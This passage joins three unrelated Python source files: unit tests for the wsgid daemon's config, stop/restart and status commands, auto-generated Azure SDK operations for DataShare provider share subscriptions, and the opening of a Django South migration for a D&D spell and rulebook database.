self.assertEquals("True", h['chroot']) # An option nos passed on the command line should remain on the config file
def test_create_all_options(self):
open(os.path.join(self.CLEAN_PATH, 'wsgid.json'), 'w+') #Clean any old config file created by other tests
opt = FakeOptions(app_path=self.CLEAN_PATH, wsgi_app="app.frontends.wsgi.application",\
debug=True, no_daemon=True, workers=8, keep_alive=True, chroot=True,\
recv="tcp://127.0.0.1:7000", send="tcp://127.0.0.1:7001",\
no_debug=False, no_chroot=False, no_keep_alive=False, mongrel2_chroot = '/var/www',
django=True)
self.config.run(opt)
h = simplejson.loads(file(os.path.join(self.CLEAN_PATH, "wsgid.json"), "r+").read())
self.assertEquals("app.frontends.wsgi.application", h['wsgi_app'])
self.assertEquals("True", h['debug'])
self.assertEquals(8, h['workers'])
self.assertEquals("True", h['keep_alive'])
self.assertEquals("True", h['chroot'])
self.assertEquals("True", h['no_daemon'])
self.assertEquals("tcp://127.0.0.1:7000", h['recv'])
self.assertEquals("tcp://127.0.0.1:7001", h['send'])
self.assertEquals("/var/www", h['mongrel2_chroot'])
self.assertEquals("True", h['django'])
def test_validate_recv(self):
open(os.path.join(self.CLEAN_PATH, 'wsgid.json'), 'w+') #Clean any old config file created by other tests
opt = FakeOptions(app_path=self.CLEAN_PATH, wsgi_app="app.frontends.wsgi.application",\
debug=True, no_daemon=True, workers=8, keep_alive=True, chroot=True,\
recv="tcp//127.0.0.1:7000", send="tcp://127.0.0.1:7001",\
no_debug=False, no_chroot=False, no_keep_alive=False, mongrel2_chroot = '/var/www',
django=True)
self.assertRaises(Exception, self.config.run, opt)
def test_validate_send(self):
open(os.path.join(self.CLEAN_PATH, 'wsgid.json'), 'w+') #Clean any old config file created by other tests
opt = FakeOptions(app_path=self.CLEAN_PATH, wsgi_app="app.frontends.wsgi.application",\
debug=True, no_daemon=True, workers=8, keep_alive=True, chroot=True,\
recv="tcp://127.0.0.1:7000", send="tcp:/127.0.0.1:7001",\
no_debug=False, no_chroot=False, no_keep_alive=False, mongrel2_chroot = '/var/www',
django=True)
self.assertRaises(Exception, self.config.run, opt)
'''
the no_debug options is an extra option added by the config command
'''
def test_disable_boolean_option(self):
opt = FakeOptions(app_path=self.CLEAN_PATH, wsgi_app="app.frontends.wsgi.application",\
no_debug=True, debug=True, workers=9, keep_alive=True, chroot=True,\
recv="tcp://127.0.0.1:7000", send="tcp://127.0.0.1:7001",
no_chroot=False, no_keep_alive=False, no_daemon = False, mongrel2_chroot = '/var',
django=False)
self.config.run(opt)
h = simplejson.loads(file(os.path.join(self.CLEAN_PATH, "wsgid.json"), "r+").read())
self.assertEquals("app.frontends.wsgi.application", h['wsgi_app'])
self.assertEquals("False", h['debug'])
class CommandManageTest(unittest.TestCase):
@patch('sys.stderr')
def setUp(self, *args):
self.init = CommandInit()
self.manage = CommandManage()
self.opt = FakeOptions(app_path=APP_PATH, send_signal=signal.SIGTERM)
self.init.run(self.opt)
def test_match_command_names_matches(self):
self.assertTrue(self.manage.name_matches('stop'))
self.assertTrue(self.manage.name_matches('restart'))
self.assertFalse(self.manage.name_matches('start'))
def test_command_name(self):
self.assertEquals('restart, stop', self.manage.command_name())
def test_run_stop_command(self):
open(os.path.join(APP_PATH, "pid/master/2968.pid"), "w")
open(os.path.join(APP_PATH, "pid/master/9847.pid"), "w")
with patch('os.kill'):
self.manage.run(self.opt, command_name = 'stop')
self.assertEquals(2, os.kill.call_count)
self.assertTrue(((9847, 15), {}) in os.kill.call_args_list)
self.assertTrue(((2968, 15), {}) in os.kill.call_args_list)
def test_run_restart_command(self):
open(os.path.join(APP_PATH, "pid/worker/3847.pid"), "w")
open(os.path.join(APP_PATH, "pid/worker/4857.pid"), "w")
with patch('os.kill'):
self.manage.run(self.opt, command_name = 'restart')
self.assertEquals(2, os.kill.call_count)
self.assertTrue(((3847, 15), {}) in os.kill.call_args_list)
self.assertTrue(((4857, 15), {}) in os.kill.call_args_list)
@patch('sys.stderr')
def test_send_custom_signal(self, *args):
apppath = new_app_path('custom-signal')
opts = FakeOptions(app_path=apppath, send_signal=9)
self.init.run(opts)
open(os.path.join(apppath, "pid/master/3847.pid"), "w")
open(os.path.join(apppath, "pid/worker/3690.pid"), "w")
with patch('os.kill'):
self.manage.run(opts, command_name = 'stop')
self.manage.run(opts, command_name = 'restart')
self.assertEquals(2, os.kill.call_count)
#Check that we sent SIGKILL
self.assertEquals( [((3847, 9), {}), ((3690, 9), {})], os.kill.call_args_list)
def test_kill_already_dead_pid(self):
open(os.path.join(APP_PATH, "pid/worker/3847.pid"), "w")
open(os.path.join(APP_PATH, "pid/worker/4857.pid"), "w")
with patch('os.kill'):
os.kill = Mock(side_effect=OSError("No such process"))
self.manage.run(self.opt, command_name = 'restart')
self.assertEquals(2, os.kill.call_count)
self.assertTrue(((3847, 15), {}) in os.kill.call_args_list)
self.assertTrue(((4857, 15), {}) in os.kill.call_args_list)
'''
Check that wsgid does not crash if we have invalid pid files
'''
@patch('sys.stderr')
def test_invalid_pid_files(self, *args):
new_path = os.path.join(FIXTURES_PATH, 'crash-app')
opts = FakeOptions(app_path=new_path, send_signal=signal.SIGTERM)
self.init.run(opts)
open(os.path.join(new_path, "pid/worker/crash.pid"), "w")
with patch('os.kill'):
self.manage.run(opts, command_name = 'restart')
self.assertEquals(0, os.kill.call_count)
class CommandStatusTest(unittest.TestCase):
@patch('sys.stderr')
def setUp(self, *args):
self.init = CommandInit()
self.manage = CommandManage()
self.new_path = os.path.join(FIXTURES_PATH, 'status-command')
self.opt = FakeOptions(app_path=self.new_path, send_signal=signal.SIGTERM)
self.init.run(self.opt)
def test_command_name(self):
self.assertEquals('status', CommandStatus().command_name())
def test_command_name_matches(self):
self.assertTrue(CommandStatus().name_matches('status'))
self.assertFalse(CommandStatus().name_matches('ostatus'))
def test_list_master_pids(self):
with patch('os.kill'): #So od.kill reports any pid as "running"
with patch('sys.stdout'):
open(os.path.join(self.new_path, "pid/master/3847.pid"), "w")
open(os.path.join(self.new_path, "pid/worker/4857.pid"), "w")
CommandStatus().run(self.opt)
self.assertEquals(3, sys.stdout.write.call_count)
self.assertEquals([(("Status: Running\n",), {}),
(("Master pid(s): 3847\n",), {}),
(("Worker pid(s): 4857\n",), {})], sys.stdout.write.call_args_list)
def test_list_worker_pids(self):
path = os.path.join(FIXTURES_PATH, 'worker-pids-app')
with patch('sys.stderr'):
CommandInit().run(FakeOptions(app_path=path))
with patch('os.kill'): #So os.kill reports any pid as "running"
with patch('sys.stdout'):
open(os.path.join(path, "pid/worker/3847.pid"), "w")
open(os.path.join(path, "pid/worker/3948.pid"), "w")
open(os.path.join(path, "pid/worker/4857.pid"), "w")
CommandStatus().run(FakeOptions(app_path=path))
self.assertEquals(3, sys.stdout.write.call_count)
self.assertEquals([(("Status: Running\n",), {}),
(("Master pid(s): \n",), {}),
(("Worker pid(s): 3847, 3948, 4857\n",), {})], sys.stdout.write.call_args_list)
def test_status_when_no_worker_pids(self):
path = os.path.join(FIXTURES_PATH, 'noworker-pids-app')
with patch('sys.stderr'):
CommandInit().run(FakeOptions(app_path=path))
with patch('sys.stdout'):
open(os.path.join(path, "pid/master/3847.pid"), "w")
CommandStatus().run(FakeOptions(app_path=path))
self.assertEquals(3, sys.stdout.write.call_count)
self.assertEquals([(("Status: Stopped\n",), {}),
(("Master pid(s): 3847\n",), {}),
(("Worker pid(s): \n",), {})], sys.stdout.write.call_args_list)
def test_check_pids_are_running(self):
path = os.path.join(FIXTURES_PATH, 'check-running-pids-app')
with patch('sys.stderr'):
CommandInit().run(FakeOptions(app_path=path))
with patch('sys.stdout'):
with patch('os.kill'):
os.kill.side_effect = OSError("No such process")
open(os.path.join(path, "pid/master/3847.pid"), "w")
# Even having a valid worker pid, the final status must be Stopped becaus this process does not exist
open(os.path.join(path, "pid/worker/2845.pid"), "w")
CommandStatus().run(FakeOptions(app_path=path))
self.assertEquals(3, sys.stdout.write.call_count)
self.assertEquals([(("Status: Stopped\n",), {}),
(("Master pid(s): 3847\n",), {}),
(("Worker pid(s): 2845(dead)\n",), {})], sys.stdout.write.call_args_list)
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ProviderShareSubscriptionsOperations(object):
"""ProviderShareSubscriptionsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.datashare.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def adjust(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
provider_share_subscription_id, # type: str
provider_share_subscription, # type: "_models.ProviderShareSubscription"
**kwargs # type: Any
):
# type: (...) -> "_models.ProviderShareSubscription"
"""Adjust the expiration date of a share subscription in a provider share.
Adjust a share subscription's expiration date in a provider share.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param account_name: The name of the share account.
:type account_name: str
:param share_name: The name of the share.
:type share_name: str
:param provider_share_subscription_id: To locate shareSubscription.
:type provider_share_subscription_id: str
:param provider_share_subscription: The provider share subscription.
:type provider_share_subscription: ~azure.mgmt.datashare.models.ProviderShareSubscription
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProviderShareSubscription, or the result of cls(response)
:rtype: ~azure.mgmt.datashare.models.ProviderShareSubscription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.adjust.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
'providerShareSubscriptionId': self._serialize.url("provider_share_subscription_id", provider_share_subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(provider_share_subscription, 'ProviderShareSubscription')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DataShareError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
adjust.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions/{providerShareSubscriptionId}/adjust'} # type: ignore
def reinstate(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
provider_share_subscription_id, # type: str
provider_share_subscription, # type: "_models.ProviderShareSubscription"
**kwargs # type: Any
):
# type: (...) -> "_models.ProviderShareSubscription"
"""Reinstate share subscription in a provider share.
Reinstate share subscription in a provider share.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param account_name: The name of the share account.
:type account_name: str
:param share_name: The name of the share.
:type share_name: str
:param provider_share_subscription_id: To locate shareSubscription.
:type provider_share_subscription_id: str
:param provider_share_subscription: The provider share subscription.
:type provider_share_subscription: ~azure.mgmt.datashare.models.ProviderShareSubscription
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProviderShareSubscription, or the result of cls(response)
:rtype: ~azure.mgmt.datashare.models.ProviderShareSubscription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.reinstate.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
'providerShareSubscriptionId': self._serialize.url("provider_share_subscription_id", provider_share_subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(provider_share_subscription, 'ProviderShareSubscription')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DataShareError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
reinstate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions/{providerShareSubscriptionId}/reinstate'} # type: ignore
def _revoke_initial(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
provider_share_subscription_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ProviderShareSubscription"
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self._revoke_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
'providerShareSubscriptionId': self._serialize.url("provider_share_subscription_id", provider_share_subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DataShareError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_revoke_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions/{providerShareSubscriptionId}/revoke'} # type: ignore
def begin_revoke(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
provider_share_subscription_id, # type: str
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.ProviderShareSubscription"]
"""Revoke share subscription in a provider share.
Revoke share subscription in a provider share.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param account_name: The name of the share account.
:type account_name: str
:param share_name: The name of the share.
:type share_name: str
:param provider_share_subscription_id: To locate shareSubscription.
:type provider_share_subscription_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the ARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ProviderShareSubscription or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.datashare.models.ProviderShareSubscription]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscription"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._revoke_initial(
resource_group_name=resource_group_name,
account_name=account_name,
share_name=share_name,
provider_share_subscription_id=provider_share_subscription_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
'providerShareSubscriptionId': self._serialize.url("provider_share_subscription_id", provider_share_subscription_id, 'str'),
}
if polling is True: polling_method = ARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_revoke.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions/{providerShareSubscriptionId}/revoke'} # type: ignore
def get_by_share(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
provider_share_subscription_id, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.ProviderShareSubscription"
"""Get share subscription in a provider share.
Get share subscription in a provider share.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param account_name: The name of the share account.
:type account_name: str
:param share_name: The name of the share.
:type share_name: str
:param provider_share_subscription_id: To locate shareSubscription.
:type provider_share_subscription_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProviderShareSubscription, or the result of cls(response)
:rtype: ~azure.mgmt.datashare.models.ProviderShareSubscription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.get_by_share.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
'providerShareSubscriptionId': self._serialize.url("provider_share_subscription_id", provider_share_subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.DataShareError, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProviderShareSubscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_share.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions/{providerShareSubscriptionId}'} # type: ignore
def list_by_share(
self,
resource_group_name, # type: str
account_name, # type: str
share_name, # type: str
skip_token=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ProviderShareSubscriptionList"]
"""List of available share subscriptions to a provider share.
List share subscriptions in a provider share.
:param resource_group_name: The resource group name.
:type resource_group_name: str
:param account_name: The name of the share account.
:type account_name: str
:param share_name: The name of the share.
:type share_name: str
:param skip_token: Continuation Token.
:type skip_token: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProviderShareSubscriptionList or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.datashare.models.ProviderShareSubscriptionList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProviderShareSubscriptionList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_share.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'accountName': self._serialize.url("account_name", account_name, 'str'),
'shareName': self._serialize.url("share_name", share_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if skip_token is not None:
query_parameters['$skipToken'] = self._serialize.query("skip_token", skip_token, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ProviderShareSubscriptionList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize.failsafe_deserialize(_models.DataShareError, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_share.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DataShare/accounts/{accountName}/shares/{shareName}/providerShareSubscriptions'} # type: ignore
|
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'DndEdition'
db.create_table('dnd_dndedition', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=32)),
('system', self.gf('django.db.models.fields.CharField')(max_length=16)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=40, db_index=True)),
))
db.send_create_signal('dnd', ['DndEdition'])
# Adding model 'Rulebook'
db.create_table('dnd_rulebook', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('dnd_edition', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.DndEdition'])),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('abbr', self.gf('django.db.models.fields.CharField')(max_length=7)),
('description', self.gf('django.db.models.fields.TextField')(blank=True)),
('year', self.gf('django.db.models.fields.CharField')(max_length=4, null=True, blank=True)),
('img_url', self.gf('django.db.models.fields.URLField')(max_length=255, blank=True)),
('official_url', self.gf('django.db.models.fields.URLField')(max_length=255, blank=True)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=72, db_index=True)),
))
db.send_create_signal('dnd', ['Rulebook'])
# Adding model 'CharacterClass'
db.create_table('dnd_characterclass', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('rulebook', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Rulebook'])),
('page', self.gf('django.db.models.fields.PositiveIntegerField')(blank=True)),
('code', self.gf('django.db.models.fields.CharField')(max_length=32, blank=True)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=72, db_index=True)),
('prestige', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal('dnd', ['CharacterClass'])
# Adding unique constraint on 'CharacterClass', fields ['name', 'rulebook']
db.create_unique('dnd_characterclass', ['name', 'rulebook_id'])
# Adding model 'Domain'
db.create_table('dnd_domain', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('rulebook', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Rulebook'])),
('page', self.gf('django.db.models.fields.PositiveIntegerField')(blank=True)),
('code', self.gf('django.db.models.fields.CharField')(unique=True, max_length=32)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=72, db_index=True)),
))
db.send_create_signal('dnd', ['Domain'])
# Adding unique constraint on 'Domain', fields ['name', 'rulebook']
db.create_unique('dnd_domain', ['name', 'rulebook_id'])
# Adding model 'SpellDescriptor'
db.create_table('dnd_spelldescriptor', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=64)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=72, db_index=True)),
))
db.send_create_signal('dnd', ['SpellDescriptor'])
# Adding model 'SpellSchool'
db.create_table('dnd_spellschool', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=32)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=40, db_index=True)),
))
db.send_create_signal('dnd', ['SpellSchool'])
# Adding model 'SpellSubSchool'
db.create_table('dnd_spellsubschool', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=32)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=40, db_index=True)),
))
db.send_create_signal('dnd', ['SpellSubSchool'])
# Adding model 'Spell'
db.create_table('dnd_spell', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('added', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('rulebook', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.Rulebook'])),
('page', self.gf('django.db.models.fields.PositiveIntegerField')(null=True, blank=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=64)),
('school', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.SpellSchool'])),
('sub_school', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['dnd.SpellSubSchool'], null=True, blank=True)),
('verbal_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
('somatic_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
('material_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
('arcane_focus_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
('divine_focus_component', self.gf('django.db.models.fields.BooleanField')(default=False)),
